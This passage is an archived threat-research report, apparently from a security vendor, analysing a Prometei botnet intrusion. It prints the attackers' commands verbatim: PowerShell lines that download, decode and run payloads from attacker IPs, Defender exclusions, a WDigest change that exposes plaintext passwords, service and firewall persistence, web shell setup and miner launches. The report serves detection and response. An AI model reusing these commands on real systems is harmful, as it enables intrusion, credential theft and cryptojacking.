{
	"id": "7b92fc93-c082-460e-b0d8-af01af218c27",
	"created_at": "2026-04-06T00:21:11.358678Z",
	"updated_at": "2026-04-10T03:30:57.244314Z",
	"deleted_at": null,
	"sha1_hash": "127d85bb2f93bc1c23c229f18e99518932c70640",
	"title": "Unmasking Prometei A Deep Dive Into Our MXDR Findings",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2501201,
	"plain_text": "Unmasking Prometei A Deep Dive Into Our MXDR Findings\r\nPublished: 2024-10-23 · Archived: 2026-04-05 16:08:26 UTC\r\nCyber Threats\r\nHow does Prometei insidiously operate in a compromised system? This Managed Extended Detection and Response\r\ninvestigation conducted with the help of Trend Vision One provides a comprehensive analysis of the inner workings of this\r\nbotnet so users can stop the threat in its tracks before it inflicts damage to the system.\r\nBy: Buddy Tancio, Bren Matthew Ebriega, Mohamed Fahmy Oct 23, 2024 Read time: 15 min (4143 words)\r\nKey Takeaways\r\nThe botnet Prometei was used in an attempt to infiltrate a customer’s system through what appeared to be a targeted\r\nbrute force attack.\r\nOur Managed Extended Detection and Response investigation leveraged Trend Vision One and its response actions to\r\ndetect and mitigate the attack proactively.\r\nAs we gained a bird’s eye view of Prometei’s stealthy tactics, we traced and illustrated the botnet’s detailed\r\ninstallation routine.\r\nIntroduction\r\nIn a recent Managed Extended Detection and Response (MXDR) investigation, we analyzed a case involving the spread of\r\nthe Prometei botnet across a customer's environment, with the malicious activity detected with the help of Trend Vision One. Prometei functions as part of a larger botnet, enabling attackers to remotely control infected machines, deploy\r\nmalware, and coordinate attacks.\r\nThe Prometei botnet, reportedly dating back as far as 2016 and updated to version 3 in late\r\n2022, is a modular malware family used primarily for cryptocurrency mining (especially\r\nMonero) and credential theft. By early 2023, it had compromised over 10,000 systems globally, with significant activity in\r\nBrazil, Indonesia, and Turkey. 
The threat actors use a domain generation algorithm (DGA) as command-and-control (C\u0026C)\r\ninfrastructure and incorporate self-updating features for evasion.\r\nPrometei spreads by exploiting vulnerabilities like BlueKeep (CVE-2019-0708) and Microsoft Exchange Server\r\nvulnerabilities (CVE-2021-27065 and CVE-2021-26858), alongside using PowerShell scripts to retrieve payloads. Recent\r\nreports indicate it uses a bundled Apache Web Server with a PHP web shell for persistence. The botnet downloads\r\ncompressed archives which contain various components, which are then used to maintain control over infected devices and\r\nadapt quickly to defensive measures.\r\nThis blog will dive into our team's in-depth analysis of a Prometei sample (version 3.22). We'll examine the full scope of its\r\ninfiltration, tracing its path from initial access up to its concluding phases within the targeted network.\r\nInitial Access\r\nOur investigation began when we noticed a series of suspicious login attempts marked by multiple failed authentication\r\nrequests originating from two external IP addresses: 196[.]7[.]210[.]6 and 196[.]7[.]209[.]178. This activity immediately\r\nraised red flags as it suggested a potential brute force attack targeting the network. Our threat intelligence shows that both\r\nexternal IPs are associated with Prometei.\r\nhttps://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html\r\nPage 1 of 18\n\nFigure 1. Brute force attack on the target machine\r\nBoth IPs '196[.]7[.]210[.]6' and ‘196[.]7[.]209[.]178’ show a strong relationship to Prometei infrastructure: a direct\r\nrelationship, with one level of pivoting between the IPs and previously reported Prometei samples. Identifying the attack campaign\r\nhelps in responding to and containing such attacks and provides more insight into how to handle them. 
\r\nFigure 2: Relationship between IPs observed and Prometei Malware\r\nIPs are hardcoded inside many Prometei variants, which we consider a strong and valid relationship.\r\nFigure 3: Hardcoded IP inside Prometei variant\r\nAfter detecting several failed login attempts, we observed a successful login to the machine. Prometei spreads in the system\r\nby exploiting vulnerabilities in Remote Desktop Protocol (RDP) and Server Message Block (SMB).\r\nFigure 4. Successful initial entry for Prometei\r\nFollowing this activity, several files were created on the compromised system:\r\nC:\\Windows\\uplugplay\r\nC:\\Windows\\netwalker\r\nC:\\Windows\\updates1.7z\r\nC:\\Windows\\updates2.7z\r\nC:\\Windows\\mshlpda32.dll\r\nC:\\Windows\\7z.exe\r\nThese files were dropped in the directories C:\\Windows\\dell\\ and C:\\Windows\\. The 7-Zip archiving tool (7z.exe) was then\r\nused to extract the contents of the updates1.7z archive, which contained similar data to the updates2.7z archive. The\r\nfollowing files were extracted:\r\nsqhost.exe\r\nlibssp-0.dll\r\nlibcrypto-1_1.dll\r\nwindrlver.exe\r\nmiWalk64.exe\r\nmiWalk32.exe\r\nFigure 5. 7z.exe file used to extract contents of updates1.7z and updates2.7z\r\nThe sqhost.exe file is the main botnet binary responsible for dropping additional components and connecting to various\r\nC\u0026C servers to download more files. It is either renamed and copied to C:\\Windows\\zsvc.exe or retains the filename\r\nC:\\Windows\\sqhost.exe. It executes commands that manipulate system services and rules, including adding a firewall rule to\r\nallow traffic for sqhost.exe and configuring the UPlugPlay service to auto-start. 
These actions enable the malware to persist\r\nacross reboots and evade detection.\r\nC:\\Windows\\System32\\cmd.exe /C netsh advfirewall firewall add rule name=\"Secure Socket Tunneling Protocol\r\n(HTTP)\" dir=in action=allow program=\"c:\\windows\\sqhost.exe\" enable=yes\u0026netsh firewall add allowedprogram\r\nc:\\windows\\sqhost.exe \"Secure Socket Tunneling Protocol (HTTP)\" ENABLE\r\nC:\\Windows\\System32\\cmd.exe cmd.exe /C sc start UPlugPlay\r\nC:\\Windows\\System32\\cmd.exe /C ren C:\\windows\\zsvc.exe sqhost.exe\r\nC:\\Windows\\System32\\cmd.exe /C sc config UPlugPlay start= auto\r\nC:\\Windows\\System32\\cmd.exe /C reg add\r\n\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\UPlugPlay\" /v ImagePath /f /t REG_EXPAND_SZ\r\n/d \"c:\\windows\\sqhost.exe Dcomsvc\"\r\nC:\\Windows\\System32\\cmd.exe /C sc delete UPlugPlay\u0026sc create UPlugPlay binPath= \"c:\\windows\\sqhost.exe\r\nDcomsvc\" type= own DisplayName= \"UPlug\r\ncmd.exe /c sc query UPlugPlay\r\nC:\\Windows\\System32\\cmd.exe /C copy /y \"c:\\windows\\zsvc.exe\" C:\\windows\r\nCredential Dumping\r\nWe uncovered a command that re-enabled plaintext credential storage in the system's memory by modifying the WDigest\r\nauthentication protocol. While WDigest is typically disabled in modern Windows systems for security, the attackers used the\r\nUseLogonCredential setting to force the system to store passwords in clear text.\r\n\"C:\\Windows\\System32\\cmd.exe\" /C reg add\r\n\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\" /v UseLogonCredential /f\r\n/t REG_DWORD /d 1\r\nThe file C:\\Windows\\dell\\miwalk.exe harvested credentials from compromised machines and dumped them into\r\nC:\\Windows\\dell\\ssldata2.dll. 
This dumped file was laterally transferred as the threat propagated across the network along\r\nwith other malicious components.\r\nFigure 6. miWalk.exe file harvesting credentials and dumping them into ssldata2.dll\r\nWe detected a command that used PowerShell to configure Windows Defender to exclude the C:\\Windows and\r\nC:\\Windows\\Dell directories, allowing malicious files to evade detection.\r\ncmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -\r\nExclusionPath \"C:\\Windows\"\u0026powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath \"C:\\Windows\\Dell\"\r\nFigure 7. powershell.exe file used to evade detection\r\nLateral Movement\r\nFor lateral movement and remote execution, WMI Provider Host (wmiprvse.exe) was used. Its presence as a parent process\r\nindicates that the scripts were initiated by a WMI operation. A series of Base64-encoded payloads were written to files at\r\nC:\\windows\\*.b64 using either “WriteAllText” or “AppendAllText”. 
Although the script doesn't decode or execute the\r\ncontents immediately, it stores the encoded data for potential future actions.\r\npowershell [io.file]::AppendAllText('C:\\windows\\uplugplay.b64','\u003cBase64_encoded_string\u003e');\r\npowershell [io.file]::AppendAllText('C:\\windows\\updates1.7z.b64','\u003cBase64_encoded_string\u003e');\r\npowershell [io.file]::AppendAllText('C:\\windows\\updates2.7z.b64','\u003cBase64_encoded_string\u003e');\r\npowershell [io.file]::AppendAllText('C:\\windows\\7z.dll.b64','\u003cBase64_encoded_string\u003e');\r\npowershell [io.file]::AppendAllText('C:\\windows\\7z.exe.b64','\u003cBase64_encoded_string\u003e');\r\n powershell [io.file]::AppendAllText('C:\\windows\\winhlpx64.exe.b64','\u003cBase64_encoded_string\u003e');\r\npowershell [io.file]::AppendAllText('C:\\Windows\\zsvc.exe.b64','\u003cBase64_encoded_string\u003e');\r\npowershell [io.file]::WriteAllText('C:\\windows\\uplugplay.b64','\u003cBase64_encoded_string\u003e');\r\npowershell [io.file]::WriteAllText('C:\\windows\\updates1.7z.b64', '\u003cBase64_encoded_string\u003e');\r\npowershell [io.file]::WriteAllText('C:\\windows\\updates2.7z.b64', '\u003cBase64_encoded_string\u003e');\r\npowershell [io.file]:: WriteAllText ('C:\\windows\\7z.dll.b64','\u003cBase64_encoded_string\u003e');\r\npowershell  [io.file]::WriteAllText('C:\\windows\\netwalker.b64', '\u003cBase64_encoded_string\u003e');\r\npowershell [io.file]:: WriteAllText ('C:\\windows\\winhlpx64.exe.b64','\u003cBase64_encoded_string\u003e');\r\npowershell [io.file]:: WriteAllText ('C:\\Windows\\zsvc.exe.b64','\u003cBase64_encoded_string\u003e');\r\npowershell [io.file]::WriteAllText('C:\\windows\\ssldata2.dll.b64',' \u003cBase64_encoded_string\u003e');\r\nNext, a script decodes the Base64-encoded files (*.b64), writes the decoded data to a new file, deletes the original encoded\r\nfile, and outputs the size of the new file. This technique deploys the obfuscated content. 
For example, the file\r\n“uplugplay.b64” is decoded into “uplugplay”.\r\nprocessCmd: powershell $f='C:\\windows\\uplugplay.b64';$o='C:\\windows\\uplugplay';$data=\r\n[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($f));[io.file]::WriteAllBytes($o,$data);Remove-Item\r\n$f;Write-Host (Get-Item $o).length;\r\nFigure 8. PowerShell decoded the Base64-encoded files (*.b64 file extension) to a new file.\r\nSimilar commands were detected for other files, which were created in the following directories:\r\nC:\\Windows\\7z.dll\r\nC:\\Windows\\7z.exe\r\nC:\\Windows\\mshlpda32.dll\r\nC:\\Windows\\netwalker.b64\r\nC:\\Windows\\ssldata2.dll\r\nC:\\Windows\\updates1.7z\r\nC:\\Windows\\updates2.7z\r\nC:\\Windows\\uplugplay.b64\r\nC:\\Windows\\winhlpx64.exe\r\nC:\\Windows\\zsvc.exe\r\nDownloading of Additional Components\r\nA command retrieves a file from http://103.40[.]123[.]34/k.php?B=_AMD64,PSDN0020,504K45A188441R4UE, saving it\r\nas C:\\windows\\zsvc.exe. The script then reads zsvc.exe, applies a custom XOR-based decryption routine, and executes the\r\ndecrypted file using the PowerShell cmdlet 'Start-Process.'\r\ncmd /C echo 123\u003eC:\\Windows\\mshlpda32.dll\u0026powershell $p='C:\\windows\\zsvc.exe';(New-Object\r\nNet.WebClient).DownloadFile('http://103.40.123.34/k.php?B=_AMD64,PSDN0020,504K45A188441R4UE',$p);$d=\r\n[IO.File]::ReadAllBytes($p);$t=New-Object Byte[]($d.Length);[int]$j=0;for([int]$i=0;$i -lt $d.Length;$i++)\r\n{$j+=66;$t[$i]=(($d[$i] -bxor ($i*3 -band 255))-$j) -band 255;}[io.file]::WriteAllBytes($p,$t);Start-Process $p;\r\nSqhost.exe then connects to the external IP address 88.198.246[.]242 to download prometei.cgi, a PowerShell script for\r\nretrieving additional modules.\r\nFigure 9. 
Sqhost.exe connection to 88.198.246[.]242\r\nAs we probed deeper into the activities of the sqhost.exe process, we found that it performed a series of actions to further its\r\ngoals. First, it checked for the file 7z.dll. If it wasn't there, sqhost.exe downloaded 7z32.dll from\r\nhttp://103.41.204[.]104/7z32.dll. This file is part of the 7-Zip tool used for file management.\r\nNext, it looked for 7z.exe. If that file was missing, it retrieved 7z32.exe from the same URL. Finally, regardless of whether it\r\nfound the previous files, sqhost.exe downloaded std.7z from http://103.41.204[.]104/std2.7z, which contained additional\r\ncomponents needed for the attack.\r\npowershell.exe \"if(-not (Test-Path '7z.dll')) {(New-Object\r\nNet.WebClient).DownloadFile('http://103[.]41[.]204[.]104/7z32.dll','7z.dll');}if(-not (Test-Path '7z.exe')) {(New-Object\r\nNet.WebClient).DownloadFile('http://103.41.204[.]104/7z32.exe','7z.exe');} (New-Object\r\nNet.WebClient).DownloadFile('http://103.41.204[.]104/std2.7z','std.7z');\"\r\nFigure 10. PowerShell downloads additional files from 103[.]41[.]204[.]104\r\nCommands were observed checking the SHA1 of downloaded files to ensure their integrity by verifying the cryptographic\r\nhash.\r\nsqhost.exe /sha1chk 962F3D0B35B9FF68CDBA31A039EAD12B5789E7F6.std.7z\r\nsqhost.exe /sha1chk 344FAF61C3EB76F4A2FB6452E83ED16C9CCE73E0 7z.dll\r\nsqhost.exe /sha1chk 20FEA1314DBED552D5FEDEE096E2050369172EE1 7z.exe\r\nThe obtained 7zip tool was then utilized to extract the downloaded archives, namely std.7z or std2.7z.\r\n\"C:\\Windows\\dell\\7z.exe\" x std.7z -phorhor123 -y\r\nAnother script was found downloading walker.ini from a remote server to C:\\windows\\dell. 
The chkxwget command in\r\nsqhost.exe likely handles web-based downloads.\r\n\"C:\\Windows\\System32\\cmd.exe\" /c C:\\windows\\sqhost /chkxwget http://103.41.204[.]104/dwn.php?d=walker.ini\r\nC:\\windows\\dell\\walker.ini\r\nThe file “Socks.exe” handles RDP communication. It processes .cpass files containing potential passwords, attempts RDP\r\nlogins, and saves successful credentials to a .cpass_good file.\r\nFigure 11. rdcIip.exe reads the contents of .cpass\r\nA command collected system info via “systeminfo” and logged it to setup_gitlog.txt in C:\\Windows\\temp, followed by a\r\nping to Google's DNS (8.8.8.8), logging the results to the same file.\r\n\"C:\\Windows\\System32\\cmd.exe\" /c systeminfo\u003e\u003eC:\\Windows\\temp\\setup_gitlog.txt\u0026ping\r\n8.8.8.8\u003e\u003eC:\\Windows\\temp\\setup_gitlog.txt\r\nPropagation Method\r\nWe identified the following botnets and their primary spreading module, which are responsible for distributing Prometei\r\nacross the network:\r\nC:\\Windows\\winhlpx64.exe\r\nC:\\Windows\\dell\\rdpcIip.exe\r\nWe also encountered a suspicious command involving the execution of a binary file located in C:\\Windows\\dell\\rdpcIip.exe.\r\nThis file is associated with a Base64-encoded string, which, upon decoding, revealed binary data likely indicating a\r\npotentially malicious executable.\r\nEncoded:\r\n\"C:\\Windows\\dell\\rdpcIip.exe\" stat goodDKEST596AVIX7H8Z6scCw9coJGnHm0LKfZ+f8e1NRPLcpEhf4yr+mX0=\r\nDecoded:\r\n'\\x1d\\x0c\\x12Oz\\x01R\\x17\\x7f\\x19\\x02($iǛB}MDܤH_*}'\r\nrdpclip.exe connected to the following IP addresses:\r\n187[.]79.243.171\r\nIt then created the following file which appears to be a configuration or data file, potentially related to the botnet's\r\ncommunication with external servers.\r\nC:\\Windows\\dell\\net196[.]7.210.160.map\r\nThe executables with the “nethelper” names are 
.NET-based assemblies for lateral movement that attempt to locate and\r\nconnect to any SQL servers found in the network environment. Upon successful connection, the executables attempt to\r\ninstall sqhost.exe onto the server. This was spawned by ‘C:\\Windows\\dell\\rdpcIip.exe’.\r\n\"C:\\Windows\\dell\\nethelper4.exe\" 103.41.204[.]104 10.0.0.254:443 2AA19BFA\r\n\"C:\\Windows\\dell\\nethelper4.exe\" 103.41.204[.]104 10.17.0.42:5432 \"C:\\Windows\\dell\\10.17.0.42\"\r\nSSH Connections\r\nWe detected suspicious SSH (Secure Shell) connections from the compromised environment, with \"windrlver.exe\" initiating\r\nconnections to external IPs on port 22. This activity suggests attackers may have gained elevated access and are using secure\r\nprotocols to conceal remote operations, like uploading sensitive files or executing commands.\r\n\"C:\\windows\\dell\\windrlver.exe\" ssh 180.169.1[.]207:22 \"C:\\windows\\dell\\180.169.1.207\" 155.207.200.242 HV\r\n\"C:\\Windows\\dell\\windrlver.exe\" ssh 10.17.0[.]254:22 \"C:\\Windows\\dell\\10.17.0.254\" 103.41.204.104 HL\r\n\"C:\\windows\\dell\\windrlver.exe\" ssh 134.88.5[.]200:22 \"C:\\windows\\dell\\134.88.5.200\" 103.40.123.34 HV\r\n\"C:\\windows\\dell\\windrlver.exe\" ssh 187.133.137[.]81:22 \"C:\\windows\\dell\\187.133.137.81\" 103.40.123.34 HV\r\nCryptojacking\r\nThe affected machines connect to a mining pool server which can be used to mine cryptocurrencies (Monero) on\r\ncompromised machines without the victim's knowledge. This type of activity is often classified as cryptojacking, where\r\nattackers exploit the systems’ resources to generate cryptocurrency.\r\np2.feefreepool[.]net           88.198.246[.]242:80\r\nThe cryptocurrency mining payload, downloaded as “srch.7z,” is saved as “SearchIndexer.exe.” The command first checks\r\nfor SearchIndexer.exe using PowerShell; if it’s missing, it downloads srch.7z from http://103.41.204[.]104. 
After\r\ndownloading, it verifies the SHA-1 checksum against the expected hash\r\n(9280B1466527CB5B22C77C6CF42A3085A68DD326) using sqhost.exe. If the checksum matches, it extracts the contents\r\nof srch.7z with the password \"horhor123\" and deletes the original archive to erase traces.\r\n\"C:\\Windows\\System32\\cmd.exe\" /C powershell.exe \"if(-not (Test-Path 'SearchIndexer.exe')) {(New-Object\r\nNet.WebClient).DownloadFile('http://103.41.204.104/srch.7z','srch.7z');}\"\u0026sqhost.exe /sha1chk\r\n9280B1466527CB5B22C77C6CF42A3085A68DD326 srch.7z\u00267z x srch.7z -phorhor123 -y\u0026del srch.7z\r\nFigure 12. SearchIndexer.exe was extracted into the disk\r\nThe miner configuration attributes are provided by the C\u0026C through a downloaded text file named “desktop.txt”, written to\r\ndisk at “C:\\Windows\\dell\\desktop.dat”.\r\n\"C:\\Windows\\System32\\cmd.exe\" /c powershell.exe \"$d=\r\n[System.Convert]::FromBase64String('LW8gc3RyYXR1bSt0Y3A6Ly8xNDUuMjM5LjIwMC45MjozMzMzIC0tZG9uYXRlLWxldmVsIDEgLXAg\r\n[io.file]::WriteAllBytes('C:\\Windows\\dell\\Desktop.dat',$d);\"\r\nDecoded:\r\n-o stratum+tcp://145.239.200.92:3333 --donate-level 1 -p x -u id\r\nThe SearchIndexer.exe, masquerading as the legitimate Windows Search Indexer, mines cryptocurrency by connecting to a\r\nmining pool via the Stratum protocol on port 3333, with a donation level set to 1.\r\n\"C:\\Windows\\dell\\SearchIndexer.exe\" -o stratum+tcp://142.4.205[.]155:80 --donate-level 1 -p x -u id\r\n\"C:\\Windows\\dell\\SearchIndexer.exe\" -o stratum+tcp://89.163.213[.]192:3333 --donate-level 1 -p x -u id\r\n\"C:\\Windows\\dell\\SearchIndexer.exe\" -o stratum+tcp://145.239.200[.]92:3333 --donate-level 1 -p x -u id\r\nDomain Generation Algorithm (DGA)\r\nThe observed domains indicate the use of a DGA for alternative C\u0026C infrastructure. 
DGAs create numerous random domain\r\nnames, enabling Prometei to communicate with an attacker’s server even if some domains are blocked. In this case, the\r\ndomains follow a consistent pattern (starting with \"xinchaocace\" and \"xinchaobjce\") with various suffixes (.com, .net, .org).\r\nThese dynamically generated domains complicate effective domain-based blocking, suggesting that the malware is using\r\nDGA to evade detection and maintain control over the infected network.\r\nxinchaocacebm[.]com xinchaocacebd[.]com xinchaobjcebl[.]com xinchaobjcebj[.]net\r\nxinchaocacebp[.]net xinchaocacebi[.]net xinchaobjcebi[.]net xinchaobjcebe[.]org\r\nxinchaocacebo[.]org xinchaocacebd[.]net xinchaobjcebn[.]org xinchaobjcebk[.]com\r\nxinchaocacebi[.]com xinchaocacebj[.]com xinchaobjcebb[.]com Xinchaobjcebf[.]com\r\nAdditionally, we detected the use of the nslookup command querying the randomly generated domain names through\r\nGoogle’s DNS server (8.8.8.8), to attempt to resolve a C\u0026C server used by the attackers.\r\nFigure 13. Nslookup querying the randomly generated domain\r\nFigure 14. 
Sqhost.exe activity detected by Vision One Execution Profile\r\nDeployment of Web Shells\r\nIt was also observed that sqhost.exe executed a series of PowerShell commands to download and configure an Apache web\r\nserver, which acts as a WebShell for malicious activity.\r\n\"C:\\Windows\\System32\\cmd.exe\" /C del C:\\Windows\\dell\\AppServ.zip\u0026powershell.exe -nologo -noprofile -command\r\n\"new-item C:\\Windows\\dell -itemtype directory;if(-not (Test-Path 'C:\\windows\\dell\\7z.dll')) {(New-Object\r\nNet.WebClient).DownloadFile('http://103.41.204[.]104/7z32.dll', 'C:\\Windows\\dell\\7z.dll');}if(-not (Test-Path\r\n'C:\\windows\\dell\\7z.exe')) {(New-Object Net.WebClient).DownloadFile('http://103.41.204.104/7z32.exe',\r\n'C:\\Windows\\dell\\7z.exe');}if(-not (Test-Path 'C:\\ProgramData\\Microsoft\\AppServ\\www\\index.php')) {(New-Object\r\nNet.WebClient).DownloadFile('http://45.194.35[.]180:180/AppServ180.zip', 'C:\\Windows\\dell\\AppServ.zip');} new-item\r\nC:\\ProgramData\\Microsoft\\AppServ -itemtype directory;new-item C:\\ProgramData\\Microsoft\\AppServ\\cgi-bin -itemtype\r\ndirectory\"\u0026sqhost.exe /sha1chk 20FEA1314DBED552D5FEDEE096E2050369172EE1\r\nC:\\windows\\dell\\7z.exe\u0026sqhost.exe /sha1chk 344FAF61C3EB76F4A2FB6452E83ED16C9CCE73E0\r\nC:\\windows\\dell\\7z.dll\u0026sqhost.exe /sha1chk de16ad97be7fefcd7b830413e7d4d56ef96fb02b\r\nC:\\windows\\dell\\AppServ.zip\u0026C:\\windows\\dell\\7z x C:\\Windows\\dell\\AppServ.zip -oC:\\ProgramData\\Microsoft\\AppServ -\r\ny\r\nHere's a breakdown of the script:\r\nDeletes the file AppServ.zip from the C:\\Windows\\dell directory, possibly to remove traces of a previous attempt\r\nPowerShell is used to create the directories C:\\Windows\\dell and C:\\ProgramData\\Microsoft\\AppServ if they don't\r\nexist yet\r\nIt then downloads several files if they are not available already:\r\n7z32.dll (from http://103.41.204[.]104/7z32.dll)\r\n7z32.exe (from http://103.41.204[.]104/7z32.exe)\r\nAppServ180.zip (from 
http://45.194.35[.]180:180/AppServ180.zip)\r\nThe command verifies the integrity of these downloaded files using SHA-1 checksums to ensure they match:\r\n7z.exe: 20FEA1314DBED552D5FEDEE096E2050369172EE1\r\n7z.dll: 344FAF61C3EB76F4A2FB6452E83ED16C9CCE73E0\r\nAppServ.zip: de16ad97be7fefcd7b830413e7d4d56ef96fb02b\r\nIt then uses 7z.exe to extract the AppServ.zip archive into the directory C:\\ProgramData\\Microsoft\\AppServ.\r\nWe observed a PowerShell command that renames the file ssimple.php to a randomly generated name in the format Shell- followed by a 12-character string (e.g., Shell-abc123def456.php). This randomization helps attackers evade detection and\r\nmakes it more difficult for security teams to track the web shell on the compromised system.\r\ncmd.exe /C powershell \"$chars = 'abcdefghijkmnopqrstuvwxyz123456789'.ToCharArray(); $rnd=''; 1..12 | ForEach {\r\n$rnd+=$chars | Get-Random }; $s='Shell-'+$rnd+'.php';$r='C:\\ProgramData\\Microsoft\\AppServ\\www\\'+$s;Rename-Item -\r\nPath 'C:\\ProgramData\\Microsoft\\AppServ\\www\\ssimple.php' -NewName $r; Write-Host $s;  \r\nA new Windows service, ‘KtmRmSvc,’ was created with a binary path to taskhost.exe\r\n(C:\\ProgramData\\Microsoft\\AppServ\\Apache2.2\\bin), configured to start automatically at boot. This establishes persistence,\r\nenabling taskhost.exe to maintain control over the compromised system and allowing continuous access through the Web\r\nShell.\r\ncmd.exe /C sc create KtmRmSvc binPath= \"C:\\ProgramData\\Microsoft\\AppServ\\Apache2.2\\bin\\taskhost.exe -k runservice\"\r\nstart= auto\r\nCommands were observed adding new firewall rules to establish an Apache web server while disguising themselves as\r\ntaskhost.exe. 
They allow incoming traffic for taskhost.exe under the misleading name \"Secure Socket Tunneling Protocol\r\n(HTTP)\" and reinforce this by permitting the executable through the firewall. The commands also copy the PHP\r\nconfiguration file (php.ini) to C:\\Windows for accessibility and start the KtmRmSvc service to run taskhost.exe. This\r\noperation aims to obfuscate malicious activity while maintaining control over the compromised system and facilitating\r\ncommunication with the attacker’s server.\r\nnetsh advfirewall firewall add rule name=\"Secure Socket Tunneling Protocol (HTTP)\" dir=in action=allow\r\nprogram=\"C:\\ProgramData\\Microsoft\\AppServ\\Apache2.2\\bin\\taskhost.exe\" enable=yes\u0026netsh firewall add \r\nallowedprogram C:\\ProgramData\\Microsoft\\AppServ\\Apache2.2\\bin\\taskhost.exe \"Secure Socket Tunneling Protocol\r\n(HTTP)\" ENABLE\u0026copy C:\\ProgramData\\Microsoft\\AppServ\\php5\\php.ini C:\\Windows\u0026sc start KtmRmSvc\r\nFigure 15. Sqhost.exe activity detected by Vision One execution profile\r\nThrough Trend Vision One's response actions, we successfully obtained a sample of the archive\r\n'AppServ180.zip,' which contains the WebShell. 
To gain a better understanding of its functionality, we analyzed the files\r\nwithin the archive.\r\nThe archive includes three main directories:\r\nApache2.2: A portable version of the Apache webserver\r\nphp5: A portable PHP installation\r\nwww: A directory housing the webshell file (ssimple.php or Shell-{random}.php)\r\nUpon analyzing the WebShell (ssimple.php/Shell-{random}.php), we identified two key capabilities:\r\nCommand Execution: The WebShell can execute arbitrary commands on the server using PHP's system() function.\r\nFile Upload: It facilitates the upload of files to the compromised server.\r\nThis combination of capabilities gives attackers remote control over the server and the ability to upload additional malicious\r\nfiles.\r\nFigure 16. Screenshot of the Web Shell’s capability\r\nTor Connections\r\nThe command involving C:\\Windows\\dell\\msdtc.exe attempts to connect to a remote Tor-based .onion URL using a Base64-\r\nencoded string that decodes to a Prometei-related address for establishing a C\u0026C connection. This is paired with\r\nSmcard.exe, a Tor relay that links the infected system to the Tor network and initiates a SOCKS proxy on localhost ports\r\n9001 and 443.\r\nEncoded:\r\nmsdtc.exe\r\naHR0cHM6Ly9nYjduaTVyZ2VleGRjbmNqLm9uaW9uL2NnaS1iaW4vcHJvbWV0ZWkuY2dpP3I9OSZpPU44UTRZOTBPOVRUNDZNWEc=\r\nmsdtc.exe\r\naHR0cHM6Ly9nYjduaTVyZ2VleGRjbmNqLm9uaW9uL2NnaS1iaW4vcHJvbWV0ZWkuY2dpP3I9MyZpPTlBRjJIWUoyNDBJRlI0VUc=\r\nmsdtc.exe\r\naHR0cHM6Ly9nYjduaTVyZ2VleGRjbmNqLm9uaW9uL2NnaS1iaW4vcHJvbWV0ZWkuY2dpP3I9MyZpPTQ2VjI3OUFJTjUzSDUyUVo=\r\nDecoded:\r\nhttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi?r=9\u0026i=N8Q4Y90O9T4MXH\r\nhttps://gb7ni5rgeexdcncj.onion/cgi-bin/prometei.cgi?r=3\u0026i=9AF2HYJ240IFR4UG\r\nFigure 17. 
msdtc.exe, which attempts to reach out to a remote .onion URL\r\nSmcard.exe acts as a Tor relay, connecting the compromised system to the TOR network and establishing a SOCKS proxy\r\non localhost ports 9001 and 443.\r\n\"C:\\Windows\\dell\\smcard.exe\" --nt-service \"-f\" \"C:\\Windows\\dell\\torrc\"\r\nFigure 18. Smcard.exe acts as a TOR relay\r\nPrometei Installation Routine\r\nTo sum up, the Prometei installation routine, as well as the details of its associated files, are as follows:\r\nFigure 19. Prometei installation routine\r\nzsvc.exe/sqhost.exe (as the installer)\r\nFunctions as the initial installer for the botnet when executed without commands.\r\nThe sample is initially packed using UPX and employs a custom packer to unpack its main botnet code.\r\nThe custom packer checks for the presence of the file “mshlpda32.dll” in the system:\r\nIf absent, it performs the following decoy actions:\r\nCreate the file C:\\Windows\\Temp\\setup_gitlog.txt.\r\nExecute the command: C:\\Windows\\System32\\cmd.exe /c\r\nsysteminfo\u003e\u003eC:\\Windows\\temp\\setup_gitlog.txt\u0026ping 8.8.8.8\u003e\u003eC:\\Windows\\temp\\setup_gitlog.txt\r\nTerminates the current process.\r\nIf present, it unpacks the main botnet code by:\r\nReading one byte of the external file.\r\nUsing the obtained byte to decrypt the main botnet code via XOR.\r\nOnce the main botnet code is unpacked, the sample will perform checks to see if the botnet has already been installed\r\nin the system or not:\r\nWhen installing itself with admin rights it will do the following:\r\nCreate the “C:\\Windows\\dell” folder where the botnet will store its downloaded modules.\r\nCreate the registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Intel\\Support. 
This registry key will\r\ncontain the value names MachineKeyId, EncryptedMachineKeyId, and CommId, for later use by the\r\ndifferent components for C\u0026C communication.\r\nCheck the contents of the registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Fax\\\r\nvalue CommId.\r\nIf the value contained is not null, the botnet would use this registry key instead of the newly\r\ncreated one to store the previously mentioned value names.\r\nCheck if it is executed with a parameter (This will be used to know if the binary is performing\r\ninstallation or its main botnet routines). The parameter that will be used later is “Dcomsvc”\r\nHere is a summary of the executed commands it will perform for its installation:\r\nCopy Self to C:\\Windows\r\nC:\\Windows\\System32\\cmd.exe /C copy /y \"{Malware Folder}\\zsvc.exe\" C:\\windows\r\nDelete Existing UPlugPlay Service and Create UPlugPlay Service\r\nC:\\Windows\\System32\\cmd.exe /C sc delete UPlugPlay\u0026sc create UPlugPlay\r\nbinPath= \"c:\\windows\\sqhost.exe Dcomsvc\" type= own DisplayName= \"UPlug-and-Play Host\" start= auto error= ignore\r\nC:\\Windows\\System32\\cmd.exe /C sc config UPlugPlay start= auto\r\nC:\\Windows\\System32\\cmd.exe /C reg add\r\n\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\UPlugPlay\"\r\n/v ImagePath /f /t REG_EXPAND_SZ /d \"c:\\windows\\sqhost.exe Dcomsvc\"\r\nRename Self to sqhost.exe\r\nC:\\Windows\\System32\\cmd.exe /C ren C:\\windows\\zsvc.exe sqhost.exe\r\nStart UPlugPlay Service\r\nC:\\Windows\\System32\\cmd.exe cmd.exe /C sc start UPlugPlay\r\nCreate a firewall rule that will allow sqhost.exe to create connections over 